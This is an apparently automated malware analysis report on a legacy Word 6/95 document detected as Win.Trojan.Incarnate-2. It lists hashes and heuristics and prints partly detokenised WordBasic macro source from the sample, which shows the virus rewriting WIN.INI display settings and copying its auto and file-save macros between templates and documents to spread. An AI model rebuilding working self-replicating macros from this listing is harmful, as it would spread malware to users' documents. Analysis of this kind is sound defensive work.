Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c0404bfea6255463…

MALICIOUS

Office (OLE)

11.0 KB First seen: 2012-06-14
MD5: aa37401ab7262228864bf3050b7bf170 SHA-1: 1db94f076f0299e5106e784541b3f87da29967e0 SHA-256: c0404bfea6255463787cf730e0f0aa059d96ad0311dfa4299814c001b4f890ad
Risk Score: 102

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file carries legacy WordBasic macro-virus markers, specifically the string 'RSN MACRO VIRUS Goat file', and the document body refers to it explicitly. "Goat file" conventionally denotes a clean bait document used to replicate macro viruses in a lab, so this sample may be a lab replicant rather than the original carrier; treat the marker as provenance context, not as an indicator to hunt for. The carved macro source (see the extracted artifact below) shows more than the marker: string literals referencing C:\WINDOWS\WIN.INI followed by many section/key/value triples for the [windows], [Desktop] and [colors] sections, a reference to C:\WINDOWS\CONTROL.EXE, repeated pairs of "Global:<name>" and ":<name>" arguments for AutoExec, AutoExit, AutoClose, FileClose, FileSave, FileSaveAs and ToolsMacro, and the payload text "I am Darkness Incarnate..." / "CyberDarkness", which matches the ClamAV name Win.Trojan.Incarnate-2. Because the detokeniser leaves the opcodes unresolved (@cmdXXXX), the exact statements are inferred from argument shapes: the pattern is consistent with rewriting WIN.INI settings, hooking auto and File/Tools menu macros to copy itself between the global template and open documents (so it survives on the machine and spreads through saved documents), and hiding the ToolsMacro dialog. No URLs, hostnames or other network indicators are present in the recovered strings.

Heuristics 3

  • ClamAV: Win.Trojan.Incarnate-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Incarnate-2
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • Recovered legacy WordBasic macro source info OLE_LEGACY_WORDBASIC_MACRO_SOURCE
    The Word 6.0/95 document stores tokenised WordBasic macros in the WordDocument stream rather than as a modern VBA project, so VBA source extraction cannot see them. The macro source was detokenised and carved so its identifiers, string literals (file paths, URLs, registry keys, message text) and comments are available for review and signature scanning.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
wordbasic_macros.txt wordbasic-macro analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source) 5769 bytes
SHA-256: 295332b74afeeba8f321f20cb4cb458ec6bcf46e32a97d25519a4fb054558ebd
Preview script
First 1,000 lines of the extracted script. Tokens of the form @cmdXXXX are WordBasic opcodes the detokeniser did not map to statement names; only string literals, numbers and a few identifiers (MAIN, REM, dlg) are recovered verbatim, so read the listing by its arguments (file paths, INI keys, macro names, message text) rather than as runnable source.
= , , = = 29551 17253 29551 29551   8300    
21349      
    29793 21349          
        357 19827 * ,   ,  
29797 ,         =
MAIN
, - * Z
@cmd80d6 0
MAIN
, - * Z
@cmd809e
@cmd8008 @cmd810c 21 , 7 = "Windows"
@cmd8103 "C:\WINDOWS\WIN.INI" , 0
@cmd8006 @cmd810c 24 =
@cmd8046 "windows" , "ScreenSaveActive" , "0"
@cmd8046 "windows" , "DoubleClickSpeed" , "500"
@cmd8046 "windows" , "ScreenSaveActive" , "0"
@cmd8046 "windows" , "BorderWidth" , "3"
@cmd8046 "Desktop" , "Pattern" , "(None)"
@cmd8046 "Desktop" , "Wallpaper" , "(None)"
@cmd8046 "Desktop" , "GridGranularity" , "0"
@cmd8046 "Desktop" , "IconSpacing" , "75"
@cmd8046 "colors" , "Background" , "0 0 0"
@cmd8046 "colors" , "AppWorkspace" , "0 0 0"
@cmd8046 "colors" , "Window" , "255 255 255"
@cmd8046 "colors" , "WindowText" , "0 0 0"
@cmd8046 "colors" , "Menu" , "255 255 255"
@cmd8046 "colors" , "MenuText" , "0 0 0"
@cmd8046 "colors" , "ActiveTitle" , "0 0 0"
@cmd8046 "colors" , "InactiveTitle" , "0 0 0"
@cmd8046 "colors" , "TitleText" , "255 0 0"
@cmd8046 "colors" , "ActiveBorder" , "255 0 0"
@cmd8046 "colors" , "InactiveBorder" , "192 192 192"
@cmd8046 "colors" , "WindowFrame" , "0 0 0"
@cmd8046 "colors" , "Scrollbar" , "192 192 192"
@cmd8046 "colors" , "ButtonFace" , "192 192 192"
@cmd8046 "colors" , "ButtonShadow" , "128 128 128"
@cmd8046 "colors" , "ButtonText" , "0 0 0"
@cmd8046 "colors" , "GrayText" , "128 128 128"
@cmd8046 "colors" , "Hilight" , "0 128 128"
@cmd8046 "colors" , "HilightText" , "255 255 255"
@cmd8046 "colors" , "InactiveTitleText" , "255 0 0"
@cmd8046 "colors" , "ButtonHilight" , "255 255 255"
@cmd8103 "C:\WINDOWS\CONTROL.EXE" , 0
"C:\WINDOWS\CONTROL.EXE" 1
1
@cmd80ab "C:\WINDOWS\CONTROL.EXE"
@cmd8046 "Colors" , "Scrollbar" , "192 192 192"
@cmd8046 "Colors" , "Background" , "0 0 0"
@cmd8046 "Colors" , "ActiveTitle" , "0 0 0"
@cmd8046 "Colors" , "InactiveTitle" , "0 0 0"
@cmd8046 "Colors" , "Menu" , "192 192 192"
@cmd8046 "Colors" , "Window" , "0 0 0"
@cmd8046 "Colors" , "WindowFrame" , "0 0 0"
@cmd8046 "Colors" , "MenuText" , "0 0 0"
@cmd8046 "Colors" , "WindowText" , "255 0 0"
@cmd8046 "Colors" , "TitleText" , "255 0 0"
@cmd8046 "Colors" , "ActiveBorder" , "192 192 192"
@cmd8046 "Colors" , "InactiveBorder" , "192 192 192"
@cmd8046 "Colors" , "AppWorkspace" , "0 0 0"
@cmd8046 "Colors" , "Hilight" , "0 0 0"
@cmd8046 "Colors" , "HilightText" , "255 0 0"
@cmd8046 "Colors" , "ButtonFace" , "192 192 192"
@cmd8046 "Colors" , "ButtonShadow" , "128 128 128"
@cmd8046 "Colors" , "GrayText" , "128 128 128"
@cmd8046 "Colors" , "ButtonText" , "0 0 0"
@cmd8046 "Colors" , "InactiveTitleText" , "255 0 0"
@cmd8046 "Colors" , "ButtonHilight" , "255 255 255"
@cmd8046 "Colors" , "ButtonDkShadow" , "0 0 0"
@cmd8046 "Colors" , "ButtonLight" , "192 192 192"
@cmd8046 "Colors" , "InfoText" , "0 0 0"
@cmd8046 "Colors" , "InfoWindow" , "255 0 0"
@cmd8046 "Desktop" , "oldwallpaper" , "0"
@cmd8046 "Desktop" , "oldwallpaper" , "(None)"
@cmd8046 "Desktop" , "TileWallpaper" , "0"
@cmd8046 "Desktop" , "Pattern" , "(None)"
@cmd8046 "Desktop" , "Wallpaper" , "(None)"
@cmd8046 "Desktop" , "WallpaperStyle" , "0"
MAIN
, - * Z
@cmd809e
@cmd80d6 0
A @cmd0054
A
@cmd8008 @cmd803b , 8 = "Document" A
A = 0 A = 1
A = 1
@cmd80c2 "Global:AutoExec" , @cmd803b = ":AutoExec"
@cmd80c2 "Global:AutoExit" , @cmd803b = ":AutoExit"
@cmd80c2 "Global:AutoClose" , @cmd803b = ":AutoClose"
@cmd80c2 "Global:FileClose" , @cmd803b = ":FileClose"
@cmd80c2 "Global:FileSave" , @cmd803b = ":FileSave"
@cmd80c2 "Global:FileSaveAs" , @cmd803b = ":FileSaveAs"
@cmd80c2 "Global:ToolsMacro" , @cmd803b = ":ToolsMacro"
@cmd0054 A
* Z
@cmd0053
MAIN
, - * Z
@cmd809e
A = 1 @cmd80b7 0
@cmd80b8 A , 0 = "FileSave" B = 1 REM Mark 
A
B 1
@cmd80c2 @cmd803b = ":AutoExec" , "Global:AutoExec"
@cmd80c2 @cmd803b = ":AutoClose" , "Global:AutoClose"
@cmd80c2 @cmd803b = ":AutoExit" , "Global:AutoExit"
@cmd80c2 @cmd803b = ":FileClose" , "Global:FileClose"
@cmd80c2 @cmd803b = ":FileSave" , "Global:FileSave"
@cmd80c2 @cmd803b = ":FileSaveAs" , "Global:FileSaveAs"
@cmd80c2 @cmd803b = ":ToolsMacro" , "Global:ToolsMacro"
MAIN
, -
@cmd809e
@cmd80d6 0
@cmd8023 = 1 @cmd8118 = 1
@cmd8111 0
@cmdc011
@cmd807d 10
@cmd8048 0
@cmd8049 0
@cmd8047 1
@cmd8054
@cmd8012 @cmd8005 13 = @cmd8005 13 = "To end with, I would like to say..." = @cmd8005 13 = @cmd8005 13
@cmd8053
@cmd8012 "To defy me is to bring upon my wrath..." = @cmd8005 13 = "For I am"
@cmd8047 6
@cmd8048 1
@cmd8049 1
@cmd8012 " CyberDarkness"
@cmd8048 0
@cmd8049 0
@cmd8047 1
@cmd8012 "..."
@cmd8012 @cmd8005 13 = "I am Darkness Incarnate..." = @cmd8005 13 = "I will Not be Denied!!!" = @cmd8005 13 = @cmd8005 13
@cmd807d 10
@cmd00a2 = "Symbol" , = "211"
@cmd8012 @cmd8007 @cmd80f9 @cmd80f7
@cmd8047 6
@cmd8048 1
@cmd8049 1
@cmd8012 " CyberDarkness"
@cmd8048 0
@cmd8049 0
@cmd8047 1
@cmdc010
@cmd8111 1
B = 1 @cmd80b7 0
@cmd80b8 B , 0 = "FileSave" C = 1
B
C 1
@cmd80c2 @cmd803b = ":AutoExec" , "Global:AutoExec"
@cmd80c2 @cmd803b = ":AutoExit" , "Global:AutoExit"
@cmd80c2 @cmd803b = ":AutoClose" , "Global:AutoClose"
@cmd80c2 @cmd803b = ":FileClose" , "Global:FileClose"
@cmd80c2 @cmd803b = ":FileSaveAs" , "Global:FileSave"
@cmd80c2 @cmd803b = ":FileSaveAs" , "Global:FileSaveAs"
@cmd80c2 @cmd803b = ":ToolsMacro" , "Global:ToolsMacro"
@cmd80a0
MAIN
, - * Z
@cmd809e
@cmd80d6 0
A @cmd0054
A
A
A = 0 A = 1
A = 1
@cmd80c2 "Global:AutoExec" , @cmd803b = ":AutoExec"
@cmd80c2 "Global:AutoExit" , @cmd803b = ":AutoExit"
@cmd80c2 "Global:AutoClose" , @cmd803b = ":AutoClose"
@cmd80c2 "Global:FileClose" , @cmd803b = ":FileClose"
@cmd80c2 "Global:FileSave" , @cmd803b = ":FileSave"
@cmd80c2 "Global:FileSaveAs" , @cmd803b = ":FileSaveAs"
@cmd80c2 "Global:ToolsMacro" , @cmd803b = ":ToolsMacro"
@cmd0054 A
MAIN
REM Temp Delete Rest
dlg @cmd00d7
dlg
dlg
@cmd00d7 dlg